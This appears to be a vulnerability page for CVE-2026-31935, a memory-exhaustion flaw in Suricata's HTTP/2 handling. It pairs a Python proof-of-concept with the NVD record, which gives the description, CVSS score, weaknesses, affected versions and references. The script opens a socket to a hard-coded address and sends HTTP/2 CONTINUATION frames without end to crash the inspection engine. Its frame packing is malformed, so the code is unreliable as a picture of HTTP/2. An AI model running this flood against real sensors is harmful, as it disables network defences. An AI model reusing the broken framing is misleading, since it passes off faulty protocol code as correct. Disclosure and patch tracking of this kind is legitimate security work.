CVE-2026-31935

# PoC for CVE-2026-31935: Suricata HTTP2 Memory Exhaustion # This script sends a flood of HTTP2 CONTINUATION frames. import socket import struct # Target IP and Port (Suricata Inspection Interface) TARGET_IP = "192.168.1.100" TARGET_PORT = 80 def create_http2_continuation_flood(): try: # Establish TCP connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) # Send HTTP/2 Connection Preface (Simplified) preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n' s.send(preface) # Send SETTINGS frame (Simplified) settings_frame = struct.pack('>HBBLLLL', 0, 4, 0, 0, 0, 0, 0) s.send(settings_frame) print(f"[*] Flooding {TARGET_IP} with HTTP2 CONTINUATION frames...") # Send malicious CONTINUATION frames payload = b'A' * 1000 while True: # Frame Format: Length(3) | Type(1) | Flags(1) | StreamID(4) # Type 0x9 is CONTINUATION frame_header = struct.pack('>HBBLL', len(payload), 0x9, 0x0, 0x1) s.send(frame_header + payload) except Exception as e: print(f"[!] Error: {e}") finally: s.close() if __name__ == "__main__": create_http2_continuation_flood()

{"cve": {"id": "CVE-2026-31935", "sourceIdentifier": "[email protected]", "published": "2026-04-02T15:16:37.657", "lastModified": "2026-04-07T21:20:24.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, flooding of craft HTTP2 continuation frames can lead to memory exhaustion, usually resulting in the Suricata process being shut down by the operating system. This issue has been patched in versions 7.0.15 and 8.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.15", "matchCriteriaId": "1E0D4CF4-11E0-4FB1-9C17-F38257D376ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "F35C5A48-CA30-43B3-9E53-D3E51C862604"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/security/advisories/GHSA-vxrp-5pg7-7v4x", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://redmine.openinfosecfoundation.org/issues/8289", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}